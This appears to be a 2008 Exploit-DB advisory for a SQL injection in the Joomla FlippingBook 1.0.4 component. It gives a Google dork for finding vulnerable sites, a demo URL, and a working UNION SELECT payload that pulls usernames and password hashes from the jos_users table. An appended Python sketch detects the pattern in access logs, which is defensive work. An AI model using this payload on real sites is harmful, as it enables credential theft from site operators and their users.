Joomla! Component FlippingBook 1.0.4 - SQL Injection

EDB-ID: 5484
Author: cO2
Type: webapps
Platform: PHP
Published: 2008-04-22

     [  A L G E R I A     S E C U R I T Y    C R E W  ]
##########################################
#
# [ Joomla Component FlippingBook 1.0.4 SQL Injection ]
#
##########################################
[~] Vulnerability found by: cO2 [ Algeria Security Crew ]
[~] Contact: c02[at]hotmail.de
[~] Website: http://www.Dz-Secure.com
[~] Greetings: to all hackers DZ . . .
##########################################
[~] ScriptName : 'Joomla'
[~] ModuleName : 'FlippingBook'
[~]  Version() :  1.0.4
###########################################
#
# DORK 1 :  inurl:com_flippingbook
#
###########################################
[+]Demo : http://www.page-flip-tools.com/index.php?option=com_flippingbook

[+]Exploit :
 
/index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*
###########################################
[+] : You can see the password in the 'Title'
[+] : Open the page source to see the 'password'
###########################################

# milw0rm.com [2008-04-22]
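
A detection sketch for the request pattern above, as an added example that is not part of the original advisory: it flags access-log entries where `option=com_flippingbook` carries a `book_id` that is not a plain integer. The Apache combined log format, the sample lines, the function names and the premise that a legitimate `book_id` is always an integer are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry: "METHOD URI PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# "/**/" padding is made of non-word characters, so \b still isolates keywords
SQL_WORDS = re.compile(r"\b(union|select|from|concat)\b", re.I)

def check_request(uri):
    """Return a reason if uri targets com_flippingbook with a book_id that
    is not a plain integer (assumed to be the only legitimate form)."""
    query = parse_qs(urlsplit(uri).query, keep_blank_values=True)  # percent-decodes
    if "com_flippingbook" not in query.get("option", []):
        return None
    for value in query.get("book_id", []):
        if re.fullmatch(r"[0-9]+", value):
            continue
        words = sorted({w.lower() for w in SQL_WORDS.findall(value)})
        return "non-numeric book_id" + (f" with SQL keywords {words}" if words else "")
    return None

def scan(log_lines):
    """Return (client_ip, reason, uri) for every suspicious log line."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        reason = check_request(match.group(1))
        if reason:
            hits.append((line.split(" ", 1)[0], reason, match.group(1)))
    return hits

# Constructed sample log lines (documentation IP ranges, shortened payload)
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Apr/2008:10:00:01 +0000] "GET /index.php?option=com_flippingbook&Itemid=28&book_id=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [22/Apr/2008:10:02:13 +0000] "GET /index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,null/**/from/**/jos_users/* HTTP/1.1" 200 6033',
    '198.51.100.7 - - [22/Apr/2008:10:02:20 +0000] "GET /index.php?option=com_flippingbook&book_id=null%2F**%2Funion%2F**%2Fselect%2F**%2Fnull HTTP/1.1" 200 6010',
    '192.0.2.44 - - [22/Apr/2008:10:05:40 +0000] "GET /index.php?option=com_content&id=null HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, reason, uri in scan(SAMPLE_LOG):
        print(f"{ip}  {reason}  {uri}")
```

Because the rule is an allowlist on the parameter's shape rather than a keyword match, it also catches values that contain no SQL keywords at all; the keyword list only enriches the alert text.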